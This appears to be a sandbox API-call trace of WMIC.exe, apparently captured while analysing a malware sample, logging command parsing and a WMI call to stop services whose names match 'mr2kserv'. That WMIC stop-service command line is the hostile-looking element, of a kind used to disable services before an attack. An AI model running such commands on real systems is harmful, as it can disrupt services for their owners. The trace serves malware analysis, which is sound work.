SysStringLen (param_1="wmiclimofformat") returned 0xf [0295.736] SysStringLen (param_1="TABLE") returned 0x5 [0295.736] SysStringLen (param_1="wmiclimofformat") returned 0xf [0295.736] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0295.736] SysStringLen (param_1="wmiclimofformat") returned 0xf [0295.736] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0295.736] SysStringLen (param_1="wmiclimofformat") returned 0xf [0295.736] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0295.736] SysStringLen (param_1="wmiclimofformat") returned 0xf [0295.736] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0295.736] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0295.736] SysStringLen (param_1="wmiclimofformat") returned 0xf [0295.736] malloc (_Size=0x18) returned 0x3912b80 [0295.736] IUnknown:Release (This=0x34b6b88) returned 0x0 [0295.736] IUnknown:Release (This=0x34b9fa8) returned 0x0 [0295.736] IUnknown:Release (This=0x34b9ff8) returned 0x0 [0295.736] IXMLDOMNodeList:get_item (in: This=0x34b9ca0, index=19, listItem=0x323f7b0 | out: listItem=0x323f7b0*=0x34b6b88) returned 0x0 [0295.736] IXMLDOMNode:get_text (in: This=0x34b6b88, text=0x323f7b4 | out: text=0x323f7b4*="textvaluelist.xsl") returned 0x0 [0295.736] IXMLDOMNode:get_attributes (in: This=0x34b6b88, attributeMap=0x323f7ac | out: attributeMap=0x323f7ac*=0x34b9fa8) returned 0x0 [0295.737] malloc (_Size=0xc) returned 0x391adb0 [0295.737] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x34b9fa8, name="KEYWORD", namedItem=0x323f7a8 | out: namedItem=0x323f7a8*=0x34b9ff8) returned 0x0 [0295.737] free (_Block=0x391adb0) [0295.737] IXMLDOMNode:get_nodeValue (in: This=0x34b9ff8, value=0x323f768 | out: value=0x323f768*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x0)) returned 0x0 [0295.737] malloc (_Size=0xc) returned 0x391ab58 [0295.737] malloc (_Size=0xc) returned 0x391abd0 [0295.737] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0295.737] SysStringLen (param_1="TABLE") returned 0x5 [0295.737] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0295.737] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0295.737] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0295.737] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0295.737] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0295.737] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0295.737] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0295.737] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0295.737] malloc (_Size=0x18) returned 0x3912ba0 [0295.738] IUnknown:Release (This=0x34b6b88) returned 0x0 [0295.738] IUnknown:Release (This=0x34b9fa8) returned 0x0 [0295.738] IUnknown:Release (This=0x34b9ff8) returned 0x0 [0295.738] IXMLDOMNodeList:get_item (in: This=0x34b9ca0, index=20, listItem=0x323f7b0 | out: listItem=0x323f7b0*=0x34b6b88) returned 0x0 [0295.738] IXMLDOMNode:get_text (in: This=0x34b6b88, text=0x323f7b4 | out: text=0x323f7b4*="textvaluelist.xsl") returned 0x0 [0295.738] IXMLDOMNode:get_attributes (in: This=0x34b6b88, attributeMap=0x323f7ac | out: attributeMap=0x323f7ac*=0x34b9fa8) returned 0x0 [0295.738] malloc (_Size=0xc) returned 0x391ad08 [0295.738] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x34b9fa8, name="KEYWORD", namedItem=0x323f7a8 | out: namedItem=0x323f7a8*=0x34b9ff8) returned 0x0 [0295.738] free (_Block=0x391ad08) [0295.738] IXMLDOMNode:get_nodeValue (in: This=0x34b9ff8, value=0x323f768 | out: value=0x323f768*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x0)) returned 0x0 [0295.738] malloc (_Size=0xc) returned 0x391ab70 [0295.739] malloc (_Size=0xc) returned 0x391ab88 [0295.739] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0295.739] SysStringLen (param_1="TABLE") returned 0x5 [0295.739] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0295.739] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0295.739] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0295.739] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0295.739] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0295.739] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0295.739] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0295.739] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0295.739] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0295.739] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0295.739] malloc (_Size=0x18) returned 0x3912be0 [0295.739] IUnknown:Release (This=0x34b6b88) returned 0x0 [0295.739] IUnknown:Release (This=0x34b9fa8) returned 0x0 [0295.739] IUnknown:Release (This=0x34b9ff8) returned 0x0 [0295.739] IUnknown:Release (This=0x34b9ca0) returned 0x0 [0295.739] FreeThreadedDOMDocument:IUnknown:Release (This=0x34b6b48) returned 0x1 [0295.740] FreeThreadedDOMDocument:IUnknown:Release (This=0x34b45a8) returned 0x0 [0295.740] free (_Block=0x39199b8) [0295.740] GetCommandLineW () returned="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice" [0295.740] malloc (_Size=0xe0) returned 0x391aee8 [0295.740] memcpy_s (in: _Destination=0x391aee8, _DestinationSize=0xde, _Source=0x3621b78, _SourceSize=0xd0 | out: _Destination=0x391aee8) returned 0x0 [0295.740] malloc (_Size=0xc) returned 0x391ad68 [0295.740] malloc (_Size=0xc) returned 0x391abb8 [0295.740] malloc (_Size=0xc) returned 0x391abe8 [0295.740] malloc (_Size=0xc) returned 0x391ac00 [0295.740] malloc (_Size=0x80) returned 0x391afd0 [0295.740] GetLocalTime (in: lpSystemTime=0x323f74c | out: lpSystemTime=0x323f74c*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x2, wHour=0x8, wMinute=0x1d, wSecond=0x1, wMilliseconds=0x311)) [0295.740] _vsnwprintf (in: _Buffer=0x391afd0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x323f72c | out: _Buffer="04-02-2020T08:29:01") returned 19 [0295.741] lstrlenW (lpString=" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice") returned 69 [0295.741] malloc (_Size=0x8c) returned 0x391b058 [0295.741] lstrlenW (lpString=" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice") returned 69 [0295.741] lstrlenW (lpString=" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice") returned 69 [0295.741] malloc (_Size=0x8c) returned 0x391b0f0 [0295.741] lstrlenW (lpString=" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice") returned 69 [0295.741] lstrlenW (lpString=" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice") returned 69 [0295.741] lstrlenW (lpString=" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice") returned 69 [0295.741] malloc (_Size=0xa) returned 0x391acd8 [0295.741] lstrlenW (lpString="path") returned 4 [0295.741] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0295.741] malloc (_Size=0xa) returned 0x391ad50 [0295.741] malloc (_Size=0x4) returned 0x3912ee8 [0295.741] free (_Block=0x0) [0295.741] free (_Block=0x391acd8) [0295.741] lstrlenW (lpString=" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice") returned 69 [0295.741] malloc (_Size=0x1c) returned 0x3919da8 [0295.741] lstrlenW (lpString="Win32_Service") returned 13 [0295.741] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0295.741] malloc (_Size=0x1c) returned 0x3910568 [0295.741] malloc (_Size=0x8) returned 0x3910590 [0295.741] memmove_s (in: _Destination=0x3910590, _DestinationSize=0x4, _Source=0x3912ee8, _SourceSize=0x4 | out: _Destination=0x3910590) returned 0x0 [0295.741] free (_Block=0x3912ee8) [0295.741] free (_Block=0x0) [0295.741] free (_Block=0x3919da8) [0295.742] lstrlenW (lpString=" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice") returned 69 [0295.742] malloc (_Size=0xc) returned 0x391ad80 [0295.742] lstrlenW (lpString="where") returned 5 [0295.742] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0295.742] malloc (_Size=0xc) returned 0x391acd8 [0295.742] malloc (_Size=0xc) returned 0x391acc0 [0295.742] memmove_s (in: _Destination=0x391acc0, _DestinationSize=0x8, _Source=0x3910590, _SourceSize=0x8 | out: _Destination=0x391acc0) returned 0x0 [0295.742] free (_Block=0x3910590) [0295.742] free (_Block=0x0) [0295.742] free (_Block=0x391ad80) [0295.742] lstrlenW (lpString=" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice") returned 69 [0295.742] malloc (_Size=0x36) returned 0x391b188 [0295.742] lstrlenW (lpString="\"name like '%%mr2kserv%%'\"") returned 26 [0295.742] _wcsicmp (_String1="\"name like '%%mr2kserv%%'\"", _String2="\"NULL\"") returned -20 [0295.742] lstrlenW (lpString="\"name like '%%mr2kserv%%'\"") returned 26 [0295.742] lstrlenW (lpString="\"name like '%%mr2kserv%%'\"") returned 26 [0295.742] malloc (_Size=0x36) returned 0x391b1c8 [0295.742] malloc (_Size=0x10) returned 0x391ac30 [0295.742] memmove_s (in: _Destination=0x391ac30, _DestinationSize=0xc, _Source=0x391acc0, _SourceSize=0xc | out: _Destination=0x391ac30) returned 0x0 [0295.742] free (_Block=0x391acc0) [0295.742] free (_Block=0x0) [0295.742] free (_Block=0x391b188) [0295.742] lstrlenW (lpString=" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice") returned 69 [0295.742] malloc (_Size=0xa) returned 0x391ac48 [0295.742] lstrlenW (lpString="call") returned 4 [0295.742] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0295.743] malloc (_Size=0xa) returned 0x391ac60 [0295.743] malloc (_Size=0x18) returned 0x3912c00 [0295.743] memmove_s (in: _Destination=0x3912c00, _DestinationSize=0x10, _Source=0x391ac30, _SourceSize=0x10 | out: _Destination=0x3912c00) returned 0x0 [0295.743] free (_Block=0x391ac30) [0295.743] free (_Block=0x0) [0295.743] free (_Block=0x391ac48) [0295.743] lstrlenW (lpString=" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice") returned 69 [0295.743] malloc (_Size=0x18) returned 0x3912d00 [0295.743] lstrlenW (lpString="stopservice") returned 11 [0295.743] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0295.743] malloc (_Size=0x18) returned 0x3912c40 [0295.743] free (_Block=0x0) [0295.743] free (_Block=0x3912d00) [0295.743] malloc (_Size=0x18) returned 0x3912c60 [0295.743] lstrlenW (lpString="QUIT") returned 4 [0295.743] lstrlenW (lpString="path") returned 4 [0295.743] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0295.743] lstrlenW (lpString="EXIT") returned 4 [0295.743] lstrlenW (lpString="path") returned 4 [0295.743] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0295.743] free (_Block=0x3912c60) [0295.743] WbemLocator:IUnknown:AddRef (This=0x3634870) returned 0x2 [0295.743] malloc (_Size=0x18) returned 0x3912c80 [0295.743] lstrlenW (lpString="/") returned 1 [0295.743] lstrlenW (lpString="path") returned 4 [0295.744] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0295.744] lstrlenW (lpString="-") returned 1 [0295.744] lstrlenW (lpString="path") returned 4 [0295.744] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0295.744] lstrlenW (lpString="CLASS") returned 5 [0295.744] lstrlenW (lpString="path") returned 4 [0295.744] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0295.744] lstrlenW (lpString="PATH") returned 4 [0295.744] lstrlenW (lpString="path") returned 4 [0295.744] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0295.744] lstrlenW (lpString="/") returned 1 [0295.744] lstrlenW (lpString="Win32_Service") returned 13 [0295.744] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0295.744] lstrlenW (lpString="-") returned 1 [0295.744] lstrlenW (lpString="Win32_Service") returned 13 [0295.744] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0295.744] lstrlenW (lpString="Win32_Service") returned 13 [0295.744] malloc (_Size=0x1c) returned 0x3919da8 [0295.744] lstrlenW (lpString="Win32_Service") returned 13 [0295.745] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0x6a4f18e0 | out: _String="Win32_Service", _Context=0x6a4f18e0) returned="Win32_Service" [0295.745] lstrlenW (lpString="Win32_Service") returned 13 [0295.745] malloc (_Size=0x1c) returned 0x391b188 [0295.745] lstrlenW (lpString="Win32_Service") returned 13 [0295.745] wcstok (in: _String=0x0, _Delimiter=",", _Context=0x6a4f18e0 | out: _String=0x0, _Context=0x6a4f18e0) returned 0x0 [0295.745] lstrlenW (lpString="") returned 0 [0295.745] lstrlenW (lpString="WHERE") returned 5 [0295.745] lstrlenW (lpString="where") returned 5 [0295.745] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0295.745] lstrlenW (lpString="/") returned 1 [0295.745] lstrlenW (lpString="name like '%%mr2kserv%%'") returned 24 [0295.745] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%mr2kserv%%'", cchCount1=24, lpString2="/", cchCount2=1) returned 3 [0295.745] lstrlenW (lpString="-") returned 1 [0295.745] lstrlenW (lpString="name like '%%mr2kserv%%'") returned 24 [0295.745] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%mr2kserv%%'", cchCount1=24, lpString2="-", cchCount2=1) returned 3 [0295.745] lstrlenW (lpString="name like '%%mr2kserv%%'") returned 24 [0295.745] malloc (_Size=0x32) returned 0x391b208 [0295.745] lstrlenW (lpString="name like '%%mr2kserv%%'") returned 24 [0295.745] lstrlenW (lpString="/") returned 1 [0295.745] lstrlenW (lpString="call") returned 4 [0295.745] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0295.745] lstrlenW (lpString="-") returned 1 [0295.745] lstrlenW (lpString="call") returned 4 [0295.746] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0295.746] lstrlenW (lpString="call") returned 4 [0295.746] malloc (_Size=0xa) returned 0x391acf0 [0295.746] lstrlenW (lpString="call") returned 4 [0295.746] lstrlenW (lpString="GET") returned 3 [0295.746] lstrlenW (lpString="call") returned 4 [0295.746] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0295.746] lstrlenW (lpString="LIST") returned 4 [0295.746] lstrlenW (lpString="call") returned 4 [0295.746] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0295.746] lstrlenW (lpString="SET") returned 3 [0295.746] lstrlenW (lpString="call") returned 4 [0295.746] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0295.746] lstrlenW (lpString="CREATE") returned 6 [0295.746] lstrlenW (lpString="call") returned 4 [0295.746] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0295.746] lstrlenW (lpString="CALL") returned 4 [0295.746] lstrlenW (lpString="call") returned 4 [0295.746] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0295.746] lstrlenW (lpString="/") returned 1 [0295.746] lstrlenW (lpString="stopservice") returned 11 [0295.746] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0295.746] lstrlenW (lpString="-") returned 1 [0295.746] lstrlenW (lpString="stopservice") returned 11 [0295.746] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0295.746] lstrlenW (lpString="stopservice") returned 11 [0295.746] malloc (_Size=0x18) returned 0x3912c60 [0295.747] lstrlenW (lpString="stopservice") returned 11 [0295.747] ??0CHString@@QAE@XZ () returned 0x323d614 [0295.747] GetCurrentThreadId () returned 0xd44 [0295.747] GetCurrentThreadId () returned 0xd44 [0295.747] ??0CHString@@QAE@XZ () returned 0x323d59c [0295.747] malloc (_Size=0x4) returned 0x3912ee8 [0295.747] malloc (_Size=0xc) returned 0x391ac30 [0295.747] malloc (_Size=0xc) returned 0x391adc8 [0295.747] WbemLocator:IWbemLocator:ConnectServer (in: This=0x3634870, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68518 | out: ppNamespace=0xa68518*=0x363aeb0) returned 0x0 [0295.802] free (_Block=0x391adc8) [0295.802] CoSetProxyBlanket (pProxy=0x363aeb0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0295.803] free (_Block=0x3912ee8) [0295.803] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0295.803] free (_Block=0x391ac30) [0295.803] malloc (_Size=0xc) returned 0x391adb0 [0295.803] IWbemServices:GetObject (in: This=0x363aeb0, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x323d62c*=0x0, ppCallResult=0x0 | out: ppObject=0x323d62c*=0x3690a28, ppCallResult=0x0) returned 0x0 [0295.897] free (_Block=0x391adb0) [0295.897] IWbemClassObject:BeginMethodEnumeration (This=0x3690a28, lEnumFlags=0) returned 0x0 [0295.897] IWbemClassObject:NextMethod (in: This=0x3690a28, lFlags=0, pstrName=0x323d638*=0x0, ppInSignature=0x323d634*=0x0, ppOutSignature=0x323d630*=0x0 | out: pstrName=0x323d638*="StartService", ppInSignature=0x323d634*=0x0, ppOutSignature=0x323d630*=0x3690c20) returned 0x0 [0295.897] lstrlenW (lpString="StartService") returned 12 [0295.897] lstrlenW (lpString="stopservice") returned 11 [0295.897] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0295.898] IUnknown:Release (This=0x3690c20) returned 0x0 [0295.898] IWbemClassObject:NextMethod (in: This=0x3690a28, lFlags=0, pstrName=0x323d638*=0x0, ppInSignature=0x323d634*=0x0, ppOutSignature=0x323d630*=0x0 | out: pstrName=0x323d638*="StopService", ppInSignature=0x323d634*=0x0, ppOutSignature=0x323d630*=0x3690c20) returned 0x0 [0295.898] lstrlenW (lpString="StopService") returned 11 [0295.898] lstrlenW (lpString="stopservice") returned 11 [0295.898] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0295.898] malloc (_Size=0x38) returned 0x391b9b8 [0295.898] ??0CHString@@QAE@XZ () returned 0x323d17c [0295.898] GetCurrentThreadId () returned 0xd44 [0295.898] IWbemClassObject:GetNames (in: This=0x3690c20, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x323d18c | out: pNames=0x323d18c*="\x01ƀ\x04") returned 0x0 [0295.899] SafeArrayGetLBound (in: psa=0x3690e88, nDim=0x1, plLbound=0x323d178 | out: plLbound=0x323d178) returned 0x0 [0295.899] SafeArrayGetUBound (in: psa=0x3690e88, nDim=0x1, plUbound=0x323d174 | out: plUbound=0x323d174) returned 0x0 [0295.899] SafeArrayGetElement (in: psa=0x3690e88, rgIndices=0x323d180, pv=0x323d190 | out: pv=0x323d190) returned 0x0 [0295.899] malloc (_Size=0x24) returned 0x391b9f8 [0295.900] IWbemClassObject:GetPropertyQualifierSet (in: This=0x3690c20, wszProperty="ReturnValue", ppQualSet=0x323d0a0 | out: ppQualSet=0x323d0a0*=0x363aa60) returned 0x0 [0295.900] malloc (_Size=0xc) returned 0x391ac30 [0295.900] IWbemQualifierSet:Get (in: This=0x363aa60, wszName="CIMTYPE", lFlags=0, pVal=0x323d070*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x323d070*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x0), plFlavor=0x0) returned 0x0 [0295.900] free (_Block=0x391ac30) [0295.900] malloc (_Size=0xc) returned 0x391ac30 [0295.900] IWbemClassObject:Get (in: This=0x3690c20, wszName="ReturnValue", lFlags=0, pVal=0x323d048*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x323d084*=52678764, plFlavor=0x0 | out: pVal=0x323d048*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x323d084*=19, plFlavor=0x0) returned 0x0 [0295.900] malloc (_Size=0xc) returned 0x391aca8 [0295.901] IWbemQualifierSet:Get (in: This=0x363aa60, wszName="read", lFlags=0, pVal=0x323d088*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x323d088*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0295.901] free (_Block=0x391aca8) [0295.901] malloc (_Size=0xc) returned 0x391ad08 [0295.901] IWbemQualifierSet:Get (in: This=0x363aa60, wszName="write", lFlags=0, pVal=0x323d088*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x323d088*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0295.901] free (_Block=0x391ad08) [0295.901] malloc (_Size=0xc) returned 0x391ad80 [0295.901] malloc (_Size=0xc) returned 0x391ac78 [0295.901] IWbemQualifierSet:Get (in: This=0x363aa60, wszName="Description", lFlags=0, pVal=0x323d060*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x323d060*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0295.901] free (_Block=0x391ac78) [0295.901] malloc (_Size=0xc) returned 0x391adb0 [0295.901] lstrlenA (lpString="Not Available") returned 13 [0295.901] malloc (_Size=0x1c) returned 0x391ba28 [0295.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa21d94, cbMultiByte=-1, lpWideCharStr=0x391ba28, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0295.901] free (_Block=0x391ba28) [0295.902] IUnknown:Release (This=0x363aa60) returned 0x0 [0295.902] malloc (_Size=0x24) returned 0x391ba28 [0295.902] malloc (_Size=0xc) returned 0x391adc8 [0295.902] malloc (_Size=0x24) returned 0x391ba58 [0295.902] malloc (_Size=0x38) returned 0x391ba88 [0295.902] malloc (_Size=0x24) returned 0x391bac8 [0295.902] free (_Block=0x391ba58) [0295.902] free (_Block=0x391ba28) [0295.902] free (_Block=0x391b9f8) [0295.902] free (_Block=0x391ad80) [0295.902] free (_Block=0x391adb0) [0295.902] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0295.902] IWbemClassObject:GetMethodQualifierSet (in: This=0x3690a28, wszMethod="StopService", ppQualSet=0x323d594 | out: ppQualSet=0x323d594*=0x36656f8) returned 0x0 [0295.903] malloc (_Size=0xc) returned 0x391acc0 [0295.903] IWbemQualifierSet:Get (in: This=0x36656f8, wszName="Implemented", lFlags=0, pVal=0x323d57c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x323d57c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0295.903] free (_Block=0x391acc0) [0295.903] malloc (_Size=0xc) returned 0x391ac90 [0295.903] malloc (_Size=0xc) returned 0x391adb0 [0295.903] IWbemQualifierSet:Get (in: This=0x36656f8, wszName="Description", lFlags=0, pVal=0x323d56c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x323d56c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0x0), plFlavor=0x0) returned 0x0 [0295.904] free (_Block=0x391adb0) [0295.904] malloc (_Size=0xc) returned 0x391aca8 [0295.904] IUnknown:Release (This=0x36656f8) returned 0x0 [0295.904] malloc (_Size=0x38) returned 0x391b9f8 [0295.904] malloc (_Size=0x38) returned 0x391ba38 [0295.904] malloc (_Size=0x24) returned 0x391baf8 [0295.904] malloc (_Size=0xc) returned 0x391acc0 [0295.904] malloc (_Size=0x38) returned 0x391bb28 [0295.904] malloc (_Size=0x38) returned 0x391bb68 [0295.904] malloc (_Size=0x24) returned 0x391bba8 [0295.904] malloc (_Size=0x28) returned 0x391bbd8 [0295.904] malloc (_Size=0x38) returned 0x391bc08 [0295.904] malloc (_Size=0x38) returned 0x391bc48 [0295.904] malloc (_Size=0x24) returned 0x391bc88 [0295.904] free (_Block=0x391bba8) [0295.904] free (_Block=0x391bb68) [0295.905] free (_Block=0x391bb28) [0295.905] free (_Block=0x391baf8) [0295.905] free (_Block=0x391ba38) [0295.905] free (_Block=0x391b9f8) [0295.905] IUnknown:Release (This=0x3690c20) returned 0x0 [0295.905] free (_Block=0x391bac8) [0295.905] free (_Block=0x391ba88) [0295.905] free (_Block=0x391b9b8) [0295.905] IWbemClassObject:NextMethod (in: This=0x3690a28, lFlags=0, pstrName=0x323d638*=0x0, ppInSignature=0x323d634*=0x0, ppOutSignature=0x323d630*=0x0 | out: pstrName=0x323d638*="PauseService", ppInSignature=0x323d634*=0x0, ppOutSignature=0x323d630*=0x3667328) returned 0x0 [0295.905] lstrlenW (lpString="PauseService") returned 12 [0295.905] lstrlenW (lpString="stopservice") returned 11 [0295.905] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0295.905] IUnknown:Release (This=0x3667328) returned 0x0 [0295.905] IWbemClassObject:NextMethod (in: This=0x3690a28, lFlags=0, pstrName=0x323d638*=0x0, ppInSignature=0x323d634*=0x0, ppOutSignature=0x323d630*=0x0 | out: pstrName=0x323d638*="ResumeService", ppInSignature=0x323d634*=0x0, ppOutSignature=0x323d630*=0x3667328) returned 0x0 [0295.905] lstrlenW (lpString="ResumeService") returned 13 [0295.905] lstrlenW (lpString="stopservice") returned 11 [0295.905] 